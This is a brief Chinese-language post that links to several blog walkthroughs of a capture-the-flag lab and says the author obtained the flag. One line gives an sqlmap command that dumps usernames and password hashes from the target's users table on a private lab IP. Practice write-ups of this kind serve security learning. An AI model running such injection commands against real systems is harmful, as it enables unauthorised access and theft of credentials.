看这个大的就是了,其他3个小的多多少少有点小问题
https://www.jianshu.com/p/88be9243b01a
https://blog.csdn.net/weixin_43583637/article/details/102828013
这里楼主是直接用sqlmap注入的
sqlmap -u http://192.168.100.136/\?nid\=1 -D d7db -T users -C name,pass --dump
https://www.cnblogs.com/ph1sh/p/12170658.html
https://www.cnblogs.com/yurang/p/13643028.html
最后楼主也是拿到flag了